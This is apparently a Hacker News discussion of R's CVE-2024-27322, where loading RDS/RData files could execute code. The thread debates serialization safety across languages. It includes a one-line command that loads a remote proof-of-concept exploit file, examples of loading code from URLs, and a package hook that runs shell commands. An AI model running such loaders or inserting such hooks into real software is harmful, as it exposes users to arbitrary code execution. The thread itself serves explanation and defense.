Statement on CVE-2024-27322
blog.r-project.org> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language.
Isn't this demonstrably false? I.e. run this [1]
load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))
and it opens the calculator application on Windows/macOS (or echoes 'pwnd' on Linux).
When someone can easily cause their hidden system code to run on my computer, that's a pretty serious vulnerability. read.csv() and fromJSON() do not allow this.
I happen to have packages on CRAN that readRDS() from AWS S3. So if I happen to be evil and make some trivial alterations to those RDS files to contain a hidden payload, well, it's child's play. That does not seem sane to me.
FWIW, my recommendation is to create a function like readRDS() that only reads data (and does not allow any extra code to be run), then use that in place of the traditional readRDS() on CRAN. Then if someone did craft a malicious payload, it wouldn't matter. The (harder) alternative would be to disallow any functions that have this remote-code-execution 'feature', i.e. allow only read.csv(), fromJSON(), and similar.
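To sketch the first idea (illustrative only, not a vetted security control; readRDS_data is a made-up name, and this assumes the R 4.4.0 fix, so readRDS itself no longer hands back an unforced promise at the top level):

    # Illustrative sketch: deserialize, then refuse anything that is not
    # plain data. A crafted payload hiding promises deeper in the structure
    # could still defeat a naive walk like this.
    readRDS_data <- function(file) {
      x <- readRDS(file)
      allowed <- c("NULL", "logical", "integer", "double",
                   "complex", "character", "raw", "list")
      walk <- function(v) {
        if (!typeof(v) %in% allowed)
          stop("refusing non-data type in RDS payload: ", typeof(v))
        if (is.list(v)) for (el in v) walk(el)
        for (a in attributes(v)) walk(a)  # attributes can carry objects too
      }
      walk(x)
      x
    }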
[1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...
It's hard not to read the quote you give as basically admitting that they _can't_ entertain the idea that there are "wider security implications" because that would be tacitly admitting that the language itself is built on shaky foundations. Something being a "core feature" _increases_ the scope of any security implications, but it also makes it a lot harder to fix without having to change fundamental parts of the language, and it sounds like that would be a non-starter for them.
Edit: apparently "load" is used to deserialize some data. Ya, this is bad, nevermind. I guess treat data stored in this format as code (effectively: don't use this format) unless it can be guaranteed safe.
I'm not an R programmer, but aren't you downloading a file from the Internet and executing it?
You could do the same thing with python/JavaScript/lua. Heck, you could do it with C - download, compile and then dynamically link.
If you want security don't download files from the internet and execute them.
> aren't you downloading a file from the Internet and executing it?
Downloading, yes; executing, no, or at least not to 99% of R users’ knowledge prior to this recent occurrence.
If a malicious user tries to smuggle executable code into a CSV or JSON file, that isn’t possible. But when reading in an RDS it’s trivial.
I feel very uncomfortable about asking anyone to trust my code that much, even colleagues or friends, and I definitely don’t feel comfortable trusting theirs.
Their data files on the other hand are fine, I’ll gladly read their csv or json file. (would also be glad for their RDS if there’s a way to read it without also allowing for remote code execution)
I thought that deserialization of language-specific serialization formats has always had dangers.
Python: https://docs.python.org/3/library/pickle.html Ruby: CVE-2013-0156
I'm sure there are more.
If you're using a serialized format, you get serialized risks.
Is it really execution by design? The docs don't suggest that:
>Description
>Reload datasets written with the function save.
> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language. Isn't this demonstrably false? I.e. run this [1]
This does not prove that the concepts of promises and/or serialization are inherently unsafe core features. It simply shows there are some implementation issues to address. You go further to talk about these implementation issues, which is helpful and good, but it does nothing to prove unsafeness or unsoundness of the concepts of promises or serialization/deserialization etc.
How many languages have had and fixed such bugs? Are those languages unsafe or insane, or were their implementations simply buggy?
Granted, in practice the difference hardly matters, since we use language implementations, not their ideal conceptual forms. But I do think it's unfair to make such claims and say that an exploit of a language implementation makes the concepts within the language inherently exploitable.
I might be missing something, but it seems there are two different streams being crossed here? (You do make good points about implementation imho, nothing wrong there ofc! :))
Part of this comes to trust and who/where trust decisions happen.
If I read the project's statement right, they think you should only load what you already trust.
The problem is that many people load things they just found on the Internet. Like `curl | bash` to random things people find.
Note, if it's not obvious, `curl | bash` to scripts on the Internet is just as insecure as the current R implementation.
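The R spellings of that pattern look like this (hypothetical URLs; each line hands control to whoever runs the server):

    source("https://example.com/setup.R")               # explicit remote code execution
    load(url("https://example.com/data.rda"))           # "just data"; before the fix, also code execution
    x <- readRDS(url("https://example.com/model.rds"))  # same trust model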
I don’t know. R promises are extremely powerful. Not only can they run arbitrary code (e.g. shell commands), but they have arbitrary access over the caller environment (e.g. you can pass a lazy argument to a function that can list all variable names/values of variables in the function’s body and mutate some of them).
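For example, a minimal sketch of how much power a lazy argument has over its caller (assumes f is called from the top level, so f's frame is frame 1):

    f <- function(x) {
      secret <- 42
      x           # forcing the lazy argument evaluates the caller's expression
      secret
    }

    f({
      env <- sys.frame(1)  # reach back into f's own frame
      print(ls(env))       # list f's local variables: "secret", "x"
      env$secret <- 999    # mutate a local variable inside f
      NULL
    })
    # f() now returns 999, not 42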
I also don’t know if deserializing is 100% secure even now, because the fix only detects whether the root value is lazy, and I’m not sure whether a value’s children can be lazy as well.
I think the larger issue is that most languages are insecure unless you go out of your way to be careful. Many package managers (including cargo) let dependencies run arbitrary build scripts. AFAIK reading a Python pickle file can invoke arbitrary code, which is arguably worse than deserializing an RDS file, because in R you at least have to read the malicious deserialized value. The problem of reading untrusted data isn’t new; see Log4j and SQL injections.
All input should be either a) trusted or b) handled carefully. Then the language doesn’t matter. The problem is that’s not easy. Like in R, if `readRDS` really can still return promises, then “handling it carefully” means inspecting every nested value without reading it (this is possible in R with reflection); or, more likely (as with Python’s pickling), reading the data in a more constrained format.
People whose day job is security probably have terms for this, but it seems important to distinguish theoretically-vulnerable and practically-vulnerable.
In the sense that for sufficiently complex ecosystems (read: all widely used programming ecosystems) each component may itself be theoretically secure... and yet the ways they are commonly used in practice are insecure.
>> Users should ensure that they only use R code and data from trusted sources and that the privileges of the account running R are appropriately limited.
IMHO, this is a cop-out. Abdicating responsibility for common use patterns in your ecosystem isn't how you make everyone more secure.
Better: 'What are our users actually doing?' -> 'Why are they doing that?' (usually: inconvenient UX around secure alternatives) -> 'How can we make it easier to use secure alternatives?'
A bit of a strange statement. It's OK, guys, for your language to have security-related bugs. Fixing the bug shows it was in the core language, and now, having fixed it, the language is more secure.
It does touch an interesting point: the 'safeness' of a language itself. A lot of languages have bugs in their core libraries and implementations, and you _could_ go as far as to say the language is then insecure.
But this is not really true. The language itself is not its implementation. The design choices and concepts provided by R are, I think, not inherently insecure. Though, as this bug shows, the implementation of those concepts can be done, inadvertently/unwittingly, in an insecure way.
I would like to encourage people to stop speaking about languages as safe/unsafe. This seems too popular today. Languages are complicated as hell to implement, and complex implementations come with bugs.
Raise the bug and, if it's severe, raise awareness of it. But don't shit on decades of diligent people's work because you found a bug and want your company or group to get some good marketing out of it. That is inherently unethical. These people are great programmers, likely much more advanced in their knowledge of languages and language implementation than some hacker who runs into a security hole. That should be respected and commended, and hackers can help these guys improve their already awesome creations.
Thanks to the implementers, thanks to the hackers, and let's all be friendly and peaceful, and not try to exploit someone's honest bug into a marketing opportunity by taking a shit right on their work.
It’s going to be impossible to get the majority of R users to update R to remove this vulnerability. Not the fault of R, but because so many unsophisticated users have an R install from 4 years ago, this exploit (which is not much of an exploit, really) will stick around forever.
Have there been more CVEs lately, or did the whole Jia Tan thing make them rank higher on HN?
There have been more CVEs for the last 5 or so years. The first reason is that "number of CVEs" is used in the InfoSec community as a kind of performance metric, so the "researchers" are incentivized to report total nonsense as security vulnerabilities. The second reason is that the whole "InfoSec" thing is viewed as a career choice where there is a shitload of money to be made, which caused many people with questionable skills and ethics to become "security researchers".
On the other hand, scanners do flag CVEs (and therefore regulatory patch requirements are triggered by them).
So at the end of the day, it does apply patch pressure to regulated companies.
Autogenerated security audits that flag totally irrelevant CVEs are another symptom of the same problem. Such scans usually only compare the version of the package in question, which breaks badly when distributions backport security patches, and leads to completely irrelevant results when the "vulnerability" in question pertains to configuration that is not used (a good example is the CVEs for the mail-proxy component of nginx, which I assume most people do not even know exists, let alone deploy). In the end the main effect is that if there were some real security issue, it would get buried deep in all the pointless busy-work that the InfoSec community generates for everybody else.
100% granted: the avalanche of CVEs is a serious problem.
Which is why the scanner companies are actually providing a "tell me what I need to care about" service.
In general, it does feel like we're groping (blindly) towards a healthier future.
I'd imagine a bit of both: more people looking for issues because of it, and, after something so high-profile, people more likely to pay attention and upvote because of what they've seen recently.
For example 2023q1 vs 2024q1: 7,015 vs 8,697 [1].
tl;dr R has its own pickle.load and someone decided to milk a CVE [1] out of this fact.
[1] and a blog post for bragging; thankfully they didn't do a name and a logo.
This is uncharitable.
From what I can tell, these RDS files are a common way of sharing data among R users. I would be relatively surprised if reading someone else's dataset was able to execute arbitrary code.
I think this is more like if reading a CSV via numpy could execute code.
RDS files are a common way of sharing serialized R objects. Promises are valid R objects and supported by this serialization format. They always have been and I believe it is an intentional feature. The problem is that some people may think of RDS files as more convenient CSV files, but they are not.
CSV is CSV. A serialized object is a serialized object. The main concern they cite is supply chain attacks. So it’s like saying loading a package can… load a package. Supply chain attacks will always be a thing. I’m grateful for the work of the researchers in question, but I don’t feel this is much of a blemish when it comes to R itself being insecure.
I think the researchers didn’t identify the main vulnerability. They should have talked about the risk of remote code execution from reading serialized objects from untrusted sources, when the R programmer thinks they are reading data but they are actually running code. This mistake has led to huge numbers of remote code execution vulnerabilities in all sorts of object deserialization libraries; it’s a much more common threat than supply chain attacks.
It’s true that it’s always been that way, but there are other common but unsafe ways of doing things that people eventually stopped using. Some pressure to deprecate and migrate away from unsafe APIs seems good.
Is there another way to load a saved dataset in R though, so that it can't execute anything?
Save it in the usual text-based formats, like a CSV or JSON. Outside of packages, which use serialized data by default for good reasons, I haven't seen many people loading strangers' RDS or RData files.
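For example (jsonlite is a third-party package, assumed installed):

    # Text-based interchange keeps the payload as data rather than R objects.
    write.csv(mtcars, "mtcars.csv", row.names = FALSE)
    df <- read.csv("mtcars.csv")  # parses text only

    writeLines(jsonlite::toJSON(list(a = 1:3, b = "x")), "obj.json")
    obj <- jsonlite::fromJSON("obj.json")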
If an attacker can control a package's rdb and rdx files, it's game over. They could just stick an `.onAttach` function in that does whatever they want when the package is loaded directly or imported by another package.
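For instance, a hook like the sketch below, anywhere in a package's R code, runs automatically when the package is attached:

    .onAttach <- function(libname, pkgname) {
      system("echo pwnd")  # arbitrary commands with the user's privileges
    }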
The fact that they had to mess with unbound promises, and that the bug got fixed, suggests you normally can't run any code from load().
.pkl files were, are, and will remain a common way of sharing data among Python users, despite being known to be unsafe since forever, and nobody claimed a CVE for this fact.
A few years back I heard from a lot of people working in ML communities that they were surprised that `numpy.load` was able to execute arbitrary code.
There are lots of Python pickle remote code execution CVEs https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=pickle
> A few years back I have heard from a lot of people working in ML communities that they are surprised that `numpy.load` is able to execute arbitrary code.
This is correct: before version 1.16.3 (April 2019), `numpy.load` was unsafe by default unless you explicitly specified `allow_pickle=False`. However, to be clear, that unsafe default was fortunately changed. Loading numpy arrays with `numpy.load` should now be safe (unless there are yet-to-be-found bugs in that code).
> Despite it is known to be unsafe since forever and nobody claimed a CVE for this fact.
There have been dozens, if not _hundreds_, of CVEs filed on issues related to pickle and RCE.
Here is a small sample:
Those are CVEs on other software that use pickle in insecure ways. Not on pickle itself.
For applications using pickle on untrusted data, that's a big distinction. There are a huge number of similar Java and C# object serialization bugs as well.
There aren't in C#. Neither Newtonsoft.Json (by default) nor System.Text.Json (at all) allows uncontrolled deserialization. Pretty much no code ever defaulted to Newtonsoft's TypeNameHandling.Auto, and the community has always been aware of its dangers, especially in light of incidents like Log4j.
And BinaryFormatter was deprecated long ago (and has now been completely removed, as a breaking change, something that pretty much never happens otherwise), and even when it was in use (more than a decade ago, popularity-wise), the use of type binding was heavily encouraged.
C# is pretty hard-nosed about serialization.
E.g. my discovery the other day that, out of the box, C# System.Text.Json can't serialize System.Exception without writing a custom serializer [0] (since 2020, because of .NET fix speed...). Newtonsoft handles it fine. (Had wanted a quick-and-dirty debugging dump of properties.)
A serializer cannot make a reasonable assumption about how an exception should be serialized on the user's behalf, let alone deserialized. Newtonsoft had and still has quite a few problematic defaults where people can inadvertently weaken privacy and security of the implementation, which System.Text.Json is opinionated in solving.
If you are okay with risks that come from including exception's message in data sent over the network (e.g. not publicly exposed), then defining a custom converter is trivial (it's like 10-15 lines and adding it to serializer options), or you could simply .ToString/.Message it and include that in the payload instead. It's a minute thing.
As for exception deserialization, that's a gross feature misuse and not something that should be done.
To me, it feels like an abuse of "you shouldn't be doing that"-ism.
A serializer should generate a sane serialization of whatever I throw at it. Or at least have an option that allows me to force that.
If I then choose to send that serialization somewhere unreasonable, that's on me.
In my case, I was hacking in C#-on-top-of-another-environment, so didn't have full access to reimplement stuff, without jumping through additional hoops.
That said, absolutely agreed on de-serialization, as larger opportunities for footguns abound.
I was thinking of BinaryFormatter and NetDataContractSerializer, etc. unsafe .NET object deserialization. I'm sure the default JSON serializer in C# is safe (lmao language fanboys)
Yes but the fact that R was apparently able to fix the issue at all is a bit strange then. You can't "fix" pickle code execution.
Weird. I don't think I've ever relied on pickle for sharing data. It's too version specific. I always dump to json, or similar.
See it all the time.
CVE-2019-6446 seems to be in the right ballpark.
I think a good response from the R authors should:
• Make clear the bug is due to unsafe deserialization (not serialization as their statement says). This is important because unsafe deserialization is a major source of remote code execution vulnerabilities.
• Update the documentation to make it clear that R’s serialization and deserialization functions are not safe to use for sharing data across the network. Serialized objects should be treated as code, not data.
Blog post in question: https://hiddenlayer.com/research/r-bitrary-code-execution/
>and a blog post for bragging, thankfully they didn't do a name and a logo.
I am still amazed at how many people on HN seem to get worked up over vulnerability names. God forbid someone also slaps a piece of clip art or whatever on the blog post. Worse yet, if they buy a $5 domain... the horror!
Maybe it's just me, but I'd much rather remember "Heartbleed" over "CVE-2014-0160".
It's fine when your bugs are (unanimously) cool, be it Heartbleed, Meltdown, Spectre or Load Value Injection (this one gets a hilarious video even).
For less cool bugs, a logo and a name seem rather... strange, because such bugs happen all the time and it's not clear why this one is special. Imagine a coworker fixed a random JIRA ticket, say "switching to night mode does not work on a certain page", and then named it "Nightfall", with a logo and a landing page and a lot of bragging in the next periodic meeting.
> Imagine a coworker fixed a random JIRA ticket, say "switching to night mode does not work on a certain page", and then named it "Nightfall", with a logo and a landing page and a lot of bragging in the next periodic meeting.
Well, that would be hilarious.
> This is a brief statement on behalf or the R Core Team on the serialization bug recently reported by the cybersecurity form HiddenLayer.
Cybersecurity firm, surely? Of all the things not to proofread … a press release.